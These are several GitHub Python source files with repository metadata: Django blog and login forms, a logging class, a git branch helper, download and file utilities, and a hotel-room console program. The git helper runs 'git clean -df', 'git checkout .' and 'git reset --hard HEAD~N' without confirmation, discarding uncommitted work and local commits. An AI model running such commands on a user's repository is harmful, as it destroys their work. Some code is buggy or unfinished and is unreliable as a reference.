"text": "from django import forms\nfrom .models import BlogPost \nclass BlogPostForm(forms.Form):\n\ttitle=forms.CharField()\n\tslug=forms.SlugField()\n\tcontent=forms.CharField(widget=forms.Textarea)\n\nclass BlogPostModelForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel=BlogPost\n\t\tfields=['title','slug','content']\n\n\tdef clean_title(self,*args,**kwargs):\n\t\ttitle=self.cleaned_data.get('title')\n\t\tqs=BlogPost.objects.filter(title__iexact=title)\n\t\tif qs.exists():\n\t\t\traise forms.ValidationError('title exists.Please add another')\n\t\treturn email\n"
},
{
"alpha_fraction": 0.6601731777191162,
"alphanum_fraction": 0.6601731777191162,
"avg_line_length": 34.53845977783203,
"blob_id": "b9c7c423c7d7c6343fd4dbb6fd3ef5be6dc157bc",
"content_id": "591ce576a00e20060bd9964aadf48ef2925cb38d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 13,
"path": "/blog/urls.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "from django.urls import path,re_path #url\n\nfrom .views import (blog_post_list_view,blog_post_detail_view,blog_post_delete_view,\nblog_post_retreive_view,\nblog_post_update_view)\n\nurlpatterns = [\n \tpath('', blog_post_list_view),\n path('<str:slug>', blog_post_detail_view),\n path('<str:slug>/retreive', blog_post_retreive_view),\n path('<str:slug>/delete', blog_post_delete_view),\n path('<str:slug>/edit', blog_post_update_view),\n ]\n"
},
{
"alpha_fraction": 0.6675915718078613,
"alphanum_fraction": 0.6698113083839417,
"avg_line_length": 39.931819915771484,
"blob_id": "e9506257fa051852192ff8c72232cd631345383a",
"content_id": "3a103838aa05e106ac0238437c2e78503c50a153",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1802,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 44,
"path": "/accounts/forms.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom django.contrib.auth import authenticate,get_user_model\nUser=get_user_model()\nclass UserLoginForm(forms.Form):\n username=forms.CharField()\n password=forms.CharField(widget=forms.PasswordInput)\n\n def clean(self,*args,**kwargs):\n username=self.cleaned_data.get('username')\n password=self.cleaned_data.get('password')\n\n if username and password:\n user=authenticate(username=username , password=password)\n if not user:\n raise forms.ValidationError('This user does not exist')\n if not user.check_password(password):\n raise forms.ValidationError('Incorrect Password')\n if not user.is_active:\n raise forms.ValidationError('This user is not active')\n return super(UserLoginForm,self).clean(*args,**kwargs)\n\nclass RegisterForm(forms.ModelForm):\n firstName=forms.CharField(label='firstname')\n lastname =forms.CharField(label='lastname')\n email =forms.EmailField(label='email')\n password =forms.CharField(widget=forms.PasswordInput,label='password')\n password2 =forms.CharField(widget=forms.PasswordInput,label='confirmPassword')\n class Meta:\n model = User\n fields=['username','firstName','lastname','email','password']\n\n def clean_email(self):\n email=self.cleaned_data.get('email')\n email_qs=User.objects.filter(email=email)\n if email_qs.exists():\n raise form.ValidationError('This email is already being used')\n return email\n \n def clean_password(self):\n password=self.cleaned_data.get('password')\n password2=self.cleaned_data.get('password2')\n if password!=password2:\n raise forms.ValidationError('Password must match')\n return password\n\n"
},
{
"alpha_fraction": 0.7783018946647644,
"alphanum_fraction": 0.7924528121948242,
"avg_line_length": 29.14285659790039,
"blob_id": "984170419392c6b1182a8dc13e913a08ab181bed",
"content_id": "db0c6c3bc61672f203668b913c44ba6b26577b6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 212,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 7,
"path": "/blog/models.py",
"repo_name": "akshaymishra5395/try_django",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n# Create your models here.\nclass BlogPost(models.Model):\n\ttitle=models.CharField(max_length=120)\n\tslug=models.SlugField(unique=True)\n\tcontent=models.TextField(null=True,blank=True)\n\n"
}
] | 9 |
dyldgithub/PythonStudy
|
https://github.com/dyldgithub/PythonStudy
|
fe95437f5e437c02d8881e69bac4e9e7bb31679f
|
e68128c77f811893c658fd4f0d1e40f5cea90a70
|
96f3fd89adf2829c8486e12b664d9edb3a5e6307
|
refs/heads/master
| 2020-03-21T07:19:21.327071 | 2019-05-30T06:15:49 | 2019-05-30T06:15:49 | 138,273,797 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6913043260574341,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 27.875,
"blob_id": "28812cd9749970515b351b20324138fd9fa68a8f",
"content_id": "3418e694914b94beeb4d6f103e92e03bdc874e65",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 230,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 8,
"path": "/Tools/src/base/common/message.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:Deng yulin\n\nREJECT_INIT=\"Reject init!\"\nINVALID_LOG_LEVEL=\"Invalid log level!\"\nERROR_MODE=\"Mode error! please use \\'help\\' to get help message.\"\nERROR_PARAMETER=\"Parameter error!\""
},
{
"alpha_fraction": 0.4780219793319702,
"alphanum_fraction": 0.4890109896659851,
"avg_line_length": 15.636363983154297,
"blob_id": "412ff7176814ee0399d35342e1c1a0367e7591c9",
"content_id": "775c2ad0769bb2f7f69a34516a635c2430bde1c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 182,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 11,
"path": "/Tools/src/base/common/project.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:Deng yulin\n\nclass Project:\n Name=\"\"\n Arcs=[]\n Pms=[]\n\n def __init__(self,name=\"\",branch=\"\",arc=\"\",pm=\"\"):\n pass"
},
{
"alpha_fraction": 0.4848484992980957,
"alphanum_fraction": 0.4848484992980957,
"avg_line_length": 12.399999618530273,
"blob_id": "44a611fb3f70ea9bfcc791dfcfff09dfcb7bf66d",
"content_id": "924fda6a3a39c490db2ffe6e7636a9a84cdcd5cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 66,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 5,
"path": "/Tools/src/base/tools/__init__.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "__all__=[\n \"common_tools\",\n \"git_branch_helper\",\n \"log\"\n]"
},
{
"alpha_fraction": 0.5581061840057373,
"alphanum_fraction": 0.5609756112098694,
"avg_line_length": 17.864864349365234,
"blob_id": "52cc2c79e7ad9f7a7f0d7c906f0a5a780883039c",
"content_id": "8e40eec96cc866da620dd306a3b29f78b9a94e58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 705,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 37,
"path": "/Tools/src/base/common/file.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:Deng yulin\n\nclass File:\n attri={}\n\n def __init__(self,name,version=\"\",filetype=\"\",**attri):\n self.__name=name\n self.__version=version\n self.__type=filetype\n # 其他属性\n def add_attri(self,):\n pass\n def set_name(self,name):\n self.__name = name\n def get_version(self,version):\n self.__version = version\n def set_version(self):\n return self.__version\n\n def __str__(self):\n return str(self.__name)+\"-\"+str(self.__version)\n\n\nclass Attri:\n pass\n # def __init__(self):\n\n\n\nclass ApkBanary(File):\n pass\nclass SoBanary(File):\n pass\nclass XmlBanary(File):\n pass"
},
{
"alpha_fraction": 0.4832724928855896,
"alphanum_fraction": 0.5085158348083496,
"avg_line_length": 27.08547019958496,
"blob_id": "501a042cdb39bcd9723616b6f8f2f197ccbb11b8",
"content_id": "774fafec7d702297cf9499adfc3cc04104814f9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3288,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 117,
"path": "/Tools/src/base/tools/log.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:Deng yulin\n\nimport time\nfrom base.common.message import *\n\n\nclass Log:\n PARENT_TAG = \"\"\n class __LogLevel:\n color = \"\"\n\n def __init__(self, description, priority, color=\"\\033[0;38m%s\\033[0m\"):\n self.__description = description\n self.__priority = priority\n self.color = color\n\n def __str__(self):\n return str(self.__description[0])\n\n def __gt__(self, other):\n return self.__priority > other.__priority\n\n def __ge__(self, other):\n return self.__priority >= other.__priority\n\n def __eq__(self, other):\n return self.__priority == other.__priority\n\n def __ne__(self, other):\n return self.__priority != other.__priority\n\n def __lt__(self, other):\n return self.__priority < other.__priority\n\n def __le__(self, other):\n return self.__priority <= other.__priority\n\n def __cmp__(self, other):\n if self.__priority < other.__priority:\n return -1\n elif self.__priority > other.__priority:\n return 1\n else:\n return 0\n\n Assert = __LogLevel(\"Assert\", 6, \"\\033[1;35m%s\\033[0m\")\n Error = __LogLevel(\"Error\", 5, \"\\033[1;31m%s\\033[0m\")\n Warning = __LogLevel(\"Warning\", 4, \"\\033[1;33m%s\\033[0m\")\n Info = __LogLevel(\"Info\", 3, \"\\033[1;32m%s\\033[0m\")\n Debug = __LogLevel(\"Debug\", 2, \"\\033[1;34m%s\\033[0m\")\n Verbose = __LogLevel(\"Verbose\", 1, \"\\033[1;37m%s\\033[0m\")\n DEFAULT_LOG_LEVEL = Debug\n Log_Enable = True\n\n def __init__(self, parent_tag):\n raise TypeError(REJECT_INIT)\n\n @staticmethod\n def set_parent_tag(parent_tag):\n Log.PARENT_TAG = parent_tag\n\n @staticmethod\n def a(tag=\"\", *logs):\n Log.log(tag, Log.Assert, *logs)\n\n @staticmethod\n def e(tag=\"\", *logs):\n Log.log(tag, Log.Error, *logs)\n\n @staticmethod\n def w(tag=\"\", *logs):\n Log.log(tag, Log.Warning, *logs)\n\n @staticmethod\n def i(tag=\"\", *logs):\n Log.log(tag, Log.Info, *logs)\n\n @staticmethod\n def d(tag=\"\", *logs):\n Log.log(tag, Log.Debug, *logs)\n\n @staticmethod\n def v(tag=\"\", *logs):\n Log.log(tag, Log.Verbose, *logs)\n\n @staticmethod\n def save_log_to_file(level=str(Verbose), tag=\"\", log=\"\"):\n line = \" \" + str(level) + \"\\t\" + str(tag) + \":\\t\" + str(log)\n line = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) + \"\\t\" + line\n print(level.color % line)\n\n @staticmethod\n def log(tag=\"\", level=Info, *logs):\n if not isinstance(level, Log.__LogLevel):\n raise TypeError(INVALID_LOG_LEVEL, level)\n\n if len(logs) == 0 and tag != \"\":\n logs = (tag,)\n tag = \"\"\n if tag:\n if Log.PARENT_TAG != \"\":\n tag = Log.PARENT_TAG + \"/\" + tag\n else:\n if Log.PARENT_TAG == \"\":\n tag = \"Log\"\n else:\n tag = Log.PARENT_TAG\n if level >= Log.DEFAULT_LOG_LEVEL and Log.Log_Enable:\n for log in logs:\n # print(level.color % str(log))\n Log.save_log_to_file(level,tag,log)\n\n\nif __name__ == '__main__':\n pass\n\n\n"
},
{
"alpha_fraction": 0.5258839726448059,
"alphanum_fraction": 0.5321351885795593,
"avg_line_length": 32.457515716552734,
"blob_id": "1db63668ec3a87b7ed7564a8e181b5e422ef46aa",
"content_id": "90908e0131eb400d70634315a85e954fc91b8856",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5135,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 153,
"path": "/Tools/src/base/tools/git_branch_helper.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:Deng yulin\n\nimport sys\nimport re\nimport os\nfrom collections import OrderedDict\nfrom subprocess import getstatusoutput\nfrom base.tools.log import Log\n\ndef clear_workspace(is_clear=True):\n if is_clear:\n Log.d(\"Cleaning workspace...\")\n (status, data) = getstatusoutput(\"git clean -df && git checkout .&& git stash\")\n if status == 0:\n pass\n else:\n Log.e(\"Clean workspace fail: \"+data)\n sys.exit(status)\n\n\ndef get_local_branchs():\n (status, data) = getstatusoutput(\"git branch -vv\")\n if status == 0:\n return data.split(\"\\n\")\n else:\n Log.e(\"Get local branch fail: \"+data)\n sys.exit(status)\n\n\ndef get_remote_branchs(has_local_branch=False):\n if has_local_branch:\n (status, data) = getstatusoutput(\"git pull >/dev/null && git branch -r\")\n else:\n (status, data) = getstatusoutput(\"git branch -r\")\n if status == 0:\n return data.split(\"\\n\")\n else:\n Log.e(\"Get remote branch fail: \"+data)\n sys.exit(status)\n\n\ndef create_local_branch(local_branch, remote_branch):\n if local_branch != \"\" and remote_branch != \"\":\n (status, data) = getstatusoutput(\"git checkout -b \" + local_branch + \" \" + remote_branch)\n if status == 0:\n Log.i(\"Switched to a new branch \\\"\" + local_branch + \"\\\"\")\n else:\n Log.e(\"Create local branch fail: \"+data)\n sys.exit(status)\n else:\n Log.d(\"Create local branch fail: parameter is null\")\n\n\ndef guide_user_choose(list, prompt, stop_condition=('N', 'n')):\n if type(list).__name__ == 'list' and len(list) >= 2:\n dict = OrderedDict()\n for i in range(1, len(list) + 1):\n dict[str(i)] = list[i - 1]\n for v, k in dict.items():\n Log.i(v+\" \"+k)\n try:\n choice = input(prompt)\n while True:\n if choice in dict.keys():\n return dict[choice]\n elif choice in stop_condition:\n return \"\"\n choice = input(prompt)\n except KeyboardInterrupt:\n Log.i(\"\\nQuit\")\n sys.exit()\n else:\n Log.d(\"guide_user_choose: parameter error\")\n\n\ndef guide_and_create_local_branch(list, prompt, stop_condition=('N', 'n')):\n if type(list).__name__ == 'list' and len(list) >= 2:\n branch_info = guide_user_choose(list, prompt)\n branch_info = branch_info.lstrip()\n if branch_info != \"\" and '->' not in branch_info:\n branch_name = branch_info[branch_info.rindex('/') + 1:]\n create_local_branch(branch_name, branch_info)\n else:\n Log.d(\"guide_and_create_local_branch: parameter error\")\n\n\ndef choose_branch():\n clear_workspace()\n Log.i(\"Choosing branch...\")\n local_branchs = get_local_branchs()\n if 'no branch' in local_branchs[0] or '分离自' in local_branchs[0] or '非分支' in local_branchs[0]:\n guide_and_create_local_branch(get_remote_branchs(),\n \"There is no local banch,choose remote branch to create [1,2...,N] \")\n else:\n remote_branchs = get_remote_branchs(has_local_branch=True)\n if len(local_branchs) >= 2:\n branch_info = guide_user_choose(local_branchs, \"Which local branch? [1,2...,N] \")\n if branch_info:\n branch = branch_info.replace('*', ' ').lstrip().split(\" \")[0]\n switch_branch(branch)\n else:\n guide_and_create_local_branch(remote_branchs, \"Which remote branch? [1,2...,N] \")\n elif len(local_branchs) == 1:\n Log.i(local_branchs[0])\n try:\n while True:\n char = input(\"Use this branch? [Y/N] \")\n if char in ('Y', 'y'):\n break\n if char in ('N', 'n'):\n guide_and_create_local_branch(remote_branchs, \"Which remote branch? [1,2...,N] \")\n break\n except KeyboardInterrupt:\n Log.i(\"\\nQuit\")\n sys.exit()\n git_pull()\n\n\ndef switch_branch(branch):\n if branch:\n (status, data) = getstatusoutput(\"git checkout \" + branch)\n if status == 0:\n Log.i(\"Switch to \" + branch)\n else:\n Log.e(\"Switch branch fail: \"+data)\n sys.exit(status)\n\n\ndef git_pull():\n (status, data) = getstatusoutput(\"git status\")\n if status == 0:\n # reset local\n git_status_info = data.split(\"\\n\")[1]\n if 'ahead' in data or \"领先\" in git_status_info:\n commit_count = re.findall('\\d+', git_status_info)[-1]\n os.system(\"git reset --hard HEAD~\" + str(commit_count))\n (status, data) = getstatusoutput(\"git pull\")\n if status == 0:\n Log.d(\"Git pull success\")\n pass\n else:\n Log.e(\"Git pull fail: \" + data)\n sys.exit(status)\n else:\n Log.e(\"Git status fail: \" + data)\n sys.exit(status)\n\n\nif __name__ == '__main__':\n choose_branch()\n pass\n"
},
{
"alpha_fraction": 0.5072054862976074,
"alphanum_fraction": 0.5706433057785034,
"avg_line_length": 35.18817138671875,
"blob_id": "1a66f313882fbd133907ca4ce5eddfe3e1ab3c1c",
"content_id": "b64d8786fa0bcc1c50f0eba1bd7e875030853370",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6731,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 186,
"path": "/Tools/src/base/tools/common_tools.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:Deng yulin\n\nfrom base.tools.log import Log\n# from log import Log\nfrom subprocess import getstatusoutput\nimport sys\nimport urllib.request\nimport os\nimport random\n# from base.common.message import *\nimport shutil\n\nTAG = \"common_tool\"\n\n\ndef is_network_connect(host):\n if host == \"\":\n Log.e(TAG, \"host is null\")\n return False\n (status, data) = getstatusoutput(\"gethostip \" + host)\n Log.d(TAG, \"Check network:\" + data + \" status:\" + str(status))\n if status == 0:\n return True\n else:\n return False\n\n\ndef is_network_connecttt(url):\n if url == \"\":\n Log.e(TAG, \"host is null\")\n return False\n (status, data) = getstatusoutput(\"gethostip \" + url)\n Log.d(TAG, \"Check network:\" + data + \" status:\" + str(status))\n if status == 0:\n return True\n else:\n return False\n\n\ndef show_progressbar(num, total=100):\n if num >= 0 and total >= 0:\n rate = num / total\n r = '\\r[%s%s]' % (\">\" * num, \" \" * (100 - num))\n sys.stdout.write(r)\n sys.stdout.write(str(num) + '%')\n sys.stdout.flush()\n else:\n Log.e(TAG, \"show_progressbar: \" + ERROR_PARAMETER)\n\n\ndef reporthook(a, b, c):\n per = int(100.0 * a * b / c)\n if per > 100:\n per = 100\n show_progressbar(per, 100)\n\n\ndef down(url, filepath):\n if url and filepath:\n Log.d(TAG, \"down: \" + url + \" to \" + filepath)\n ua_list = [\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\",\n \"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\",\n \"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3\",\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\"\n ]\n user_agent = random.choice(ua_list)\n myheader = [('User-Agent', user_agent)]\n opener = urllib.request.build_opener()\n opener.addheaders = myheader\n urllib.request.install_opener(opener)\n try:\n urllib.request.urlretrieve(url, filepath, reporthook)\n print(\"\\n\")\n Log.d(TAG, \"down: \" + filepath + \" finish!\")\n return True\n except urllib.request.HTTPError as e:\n Log.e(\"down() \" + e.__str__())\n return False\n except urllib.request.URLError as e:\n Log.e(\"down() \" + e.__str__())\n return False\n except KeyError as e:\n Log.e(\"down() \" + e.__str__())\n return False\n except KeyboardInterrupt:\n Log.e(\"down() fail : user stop!\")\n return False\n else:\n Log.e(TAG, \"down() url or filename is null\")\n\n\ndef copy_file(srcfile, dstfile):\n if not os.path.exists(srcfile) and not os.path.isfile(srcfile):\n Log.e(TAG, \"copy_file() \" + srcfile + \" not exist!\")\n else:\n fpath, fname = os.path.split(dstfile)\n if not os.path.exists(fpath):\n Log.d(TAG, \"copy_file() makedirs \" + fpath)\n os.makedirs(fpath)\n shutil.copy(srcfile, dstfile)\n Log.d(TAG, \"copy_file() copy \" + srcfile + \" to \" + dstfile)\n\n\ndef move_file(srcfile, dstfile):\n if not os.path.isfile(srcfile):\n Log.e(TAG, \"move_file() \" + srcfile + \" not exist!\")\n else:\n fpath, fname = os.path.split(dstfile)\n if not os.path.exists(fpath):\n os.makedirs(fpath)\n shutil.move(srcfile, dstfile)\n Log.d(\"move_file() move \" + srcfile + \" to \" + dstfile)\n\n\ndef is_file_exist(despath):\n if despath:\n if os.path.exists(despath) and os.path.isfile(despath):\n return True\n return False\n\n\ndef default_div_key_value(file, sep):\n key = \"\"\n value = \"\"\n _dict = {}\n for line in file:\n if line.__contains__(sep):\n (key, value) = line.strip().split(sep)\n if key and value:\n _dict[key] = value\n key = \"\"\n value = \"\"\n return _dict\n\ndef load_dict_from_file(file_path, custom_key_value=None, sep=\",\"):\n if file_path:\n _dict = {}\n try:\n with open(file_path, \"r+\") as file:\n _dict = custom_key_value(file, sep)\n return _dict\n except IOError as e:\n Log.e(TAG, \"load_dict_from_file() file isn't exist\")\n return _dict\n else:\n Log.e(TAG, \"load_dict_from_file() file_path is null\")\n return None\n\n\ndef save_dic_to_file(dic, save_file_path, sep=\",\"):\n if type(dic) == 'dict' and not dic:\n if not is_file_exist(save_file_path):\n pass\n\n try:\n with open(save_file_path(), \"w\") as file:\n pass\n # for\n\n # file.write(dic[])\n except IOError as e:\n Log.e(TAG, \"load_dict_from_file() file isn't exist\")\n\n else:\n Log.e(\"save_dic_to_file() dict is null\")\n\n\nif __name__ == '__main__':\n pass\n"
},
{
"alpha_fraction": 0.3684210479259491,
"alphanum_fraction": 0.3684210479259491,
"avg_line_length": 8.5,
"blob_id": "e19238f9e917b81f9771aabac36447d93a2c6773",
"content_id": "031ac78adbbcbc91c17f53a5c85338d2290204be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 38,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 4,
"path": "/Tools/src/base/__init__.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "\n__all__=[\n \"common\",\n \"tools\"\n]"
},
{
"alpha_fraction": 0.5106382966041565,
"alphanum_fraction": 0.5248227119445801,
"avg_line_length": 14.777777671813965,
"blob_id": "6582836e9dce40ddc1d7d0736d7d1f068c6e9b64",
"content_id": "d298812c4ff9bbb5b598f1527c17509edc672261",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 9,
"path": "/Tools/src/base/common/people.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author:Deng yulin\n\n\nclass People:\n\n def __init__(self,name=\"\",sex=\"男\",mail=\"\",):\n pass"
},
{
"alpha_fraction": 0.40909090638160706,
"alphanum_fraction": 0.40909090638160706,
"avg_line_length": 10.166666984558105,
"blob_id": "7f57c36277f0e1e3f97be629c65b2048375cb4c7",
"content_id": "82b855029ded93d5e7d77f275f03bc33832c8878",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 66,
"license_type": "no_license",
"max_line_length": 14,
"num_lines": 6,
"path": "/Tools/src/base/common/__init__.py",
"repo_name": "dyldgithub/PythonStudy",
"src_encoding": "UTF-8",
"text": "__all__=[\n \"project\",\n \"people\",\n \"message\",\n \"file\"\n]"
}
] | 10 |
MariyaBosy/UnitedLayer
|
https://github.com/MariyaBosy/UnitedLayer
|
e0ac2a7f81429c92db99f0e3cd0a25ad20349bee
|
2f5640305a0cbeff4078f724da543103babf4c49
|
61fa1c6fafbc6248b5526c9614beeb593ec4a69a
|
refs/heads/master
| 2022-11-18T02:59:22.238223 | 2020-06-29T21:26:23 | 2020-06-29T21:26:23 | 275,665,555 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4916166365146637,
"alphanum_fraction": 0.5025874376296997,
"avg_line_length": 31.641891479492188,
"blob_id": "f1651664011edd36d1059b0e2826f1a1d352b3ac",
"content_id": "6f331c0c3b901cb4db77d8776c44130e6bb674ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4831,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 148,
"path": "/Hotel_Assignment.py",
"repo_name": "MariyaBosy/UnitedLayer",
"src_encoding": "UTF-8",
"text": "class Hotel:\n hotel_count = 100\n\n def __init__(self, hotel_name):\n Hotel.hotel_count += 1\n self.hotel_id = Hotel.hotel_count\n self.hotel_name = hotel_name\n self.rooms = []\n\n def addNewRoom(self, room):\n self.rooms.append(room)\n\n\nHotels = {}\n\n\nclass Room:\n def __init__(self, items):\n self.items = items\n self.price = sum(int(i[1]) for i in self.items)\n\n\ndef addRoomToHotel(hotel):\n limit = 5\n i = 0\n print(\"Enter items and their values for room\")\n items = []\n while i < limit:\n item_name = input(\"ItemName:\")\n if item_name in [i[0] for i in items]:\n print(\"You have already added this item,Please add another one\")\n continue\n if item_name == '':\n print(\"Item name cannot be empty,add item\")\n continue\n item_value = input(\"Item Value in dollars:\")\n while item_value.isnumeric() == False:\n print(\"price value should be numeric!!\")\n item_value = input(\"Item Value in dollars:\")\n items.append((item_name, int(item_value)))\n i += 1\n add_more = \"\"\n if i >= limit:\n add_more = input(\"You want to add more ? (y/n) \").lower()\n if add_more == 'y':\n limit += 1\n room = Room(items=items)\n hotel.addNewRoom(room)\n print(\"Sucessfully Added Rooms\")\n\n\ndef displayAll(budget=None):\n output = \"\"\n available = False\n room_checker = 0\n for id, hotel in Hotels.items():\n if len(hotel.rooms):\n room_checker=1\n room_output = \"\"\n roomAvailableInHotel = False\n if not budget:\n output += (\"\\n*Hotel-{0} id-{1}*\\n\".format(hotel.hotel_name, id))\n for i, room in enumerate(hotel.rooms):\n if budget:\n if budget >= room.price:\n available = roomAvailableInHotel = True\n room_output += (\"\\nRoom{0} price: ${1}\\n\".format(i+1, room.price) +\n \"Items available: \" + ', '.join(item[0] for item in room.items) + \"\\n\")\n else:\n output += (\"\\nRoom {0} price: ${1}\\n\".format(i+1, room.price))\n for item in room.items:\n output += (\"{0} : ${1} \\n\".format(item[0], item[1]))\n\n if roomAvailableInHotel == True:\n output += (\"\\n*Hotel {0} id {1}*\\n\".format(hotel.hotel_name,\n id)) + room_output\n if room_checker == 0:\n print(\"-\"*50)\n print(\"No Rooms are added yet\") \n if budget != None:\n if available == False:\n print(\"Sorry, No Rooms available under ${}..\".format(budget))\n else:\n print(\"Rooms under ${}: \".format(budget))\n print(output)\n return\n\n print(output)\n\n\ndef main():\n print(\"------WELCOME------\")\n while True:\n print(\"-\"*50)\n print(\"Select Options 1,2,3 or 4\")\n print(\"1.Add Hotel\")\n print(\"2.Add a room with items and values\")\n print(\"3.Show each room with available items and values\")\n print(\"4.Enter your budget and find rooms\")\n print(\"5.Exit\")\n\n opt_no = input()\n\n if opt_no == '1':\n hotel_name = input('Enter Hotel Name-')\n hotel = Hotel(hotel_name)\n Hotels[hotel.hotel_id] = hotel\n no_of_rooms = input(\"Enter Number of rooms to be added : \")\n if no_of_rooms.isnumeric() == False:\n print(\"No of rooms should be numeric\")\n no_of_rooms = input(\"Enter Number of rooms to be added : \")\n for i in range(int(no_of_rooms)):\n addRoomToHotel(hotel)\n\n elif opt_no == '2':\n if len(Hotels) == 0:\n print(\"-\"*50)\n print(\"No hotels added,Add hotel first\")\n continue\n print(\"Select hotel- \")\n hotel_ids = list(Hotels.keys())\n print(\"*\"*20)\n print(\"Serial No\\tHotel Id\\tHotel Name\")\n for i, hotel_id in enumerate(hotel_ids):\n print(\"{} \\t \\t{} \\t \\t{}\".format(\n i, hotel_id, Hotels[hotel_id].hotel_name))\n index = int(input(\"Enter the Serial No to choose: \"))\n 